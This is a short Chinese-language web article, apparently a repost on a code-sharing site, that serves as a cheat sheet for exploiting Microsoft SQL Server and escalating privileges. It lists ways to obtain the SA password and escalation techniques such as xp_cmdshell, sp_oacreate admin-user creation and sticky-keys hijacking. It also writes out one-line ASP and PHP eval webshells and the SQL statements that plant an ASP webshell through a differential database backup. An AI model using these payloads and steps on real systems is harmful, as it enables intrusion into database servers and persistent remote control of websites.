MSSQL 漏洞利用與提權


1、SA口令的獲取

webshell或源代碼的獲取

源代碼泄露

嗅探(用CAIN等工具嗅探1433數據庫端口)

口令暴力破解

2、常見SQL server 提權命令

查看數據庫的版本(select @@version;)

查看數據庫所在服務器操作系統的參數

查看數據庫啟動的參數

查看數據庫啟動的時間

查看數據庫服務器名和實例名

查看用戶登錄信息

查看數據庫里所所有的存儲工程和函數

查看數據庫里用戶和進程的信息

恢復存儲過程

開啟和關閉xp_cmdshell

xp_cmdshell執行命令

開啟和關閉sp_oacreate

sp_oacreate刪除文件

sp_oacreate復制文件

sp_oacreate移動文件

sp_oacreate添加管理員用戶

開啟和關閉sp_makeweblask\

wscript.shell執行命令

shell.applocation執行命令

開啟和關閉openrowset

沙盒執行命令

注冊表劫持粘貼鍵

sp_oacreate替換粘貼鍵

public提權操作

echo一句話后門(echo  <%eval request(cmd)%> >d:\wwwroot\ok.asp    echo  <? php @eval($_POST[cmd]);?> >cmd.php)

在mssql 中查詢password

3、通過數據庫備份獲取webshell

差異備份一句話木馬

backup database [當前數據庫名] to disk = 'c:\recycler\1.bak'

create table cmd (a image);

insert into cmd(a) values ('<%eval request("cmd")%>');

backup database [當前數據庫名] to disk = '網站絕對路徑' WITH DIFFERENTIAL,FORMAT--

 

LOG 備份一句話木馬(......)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM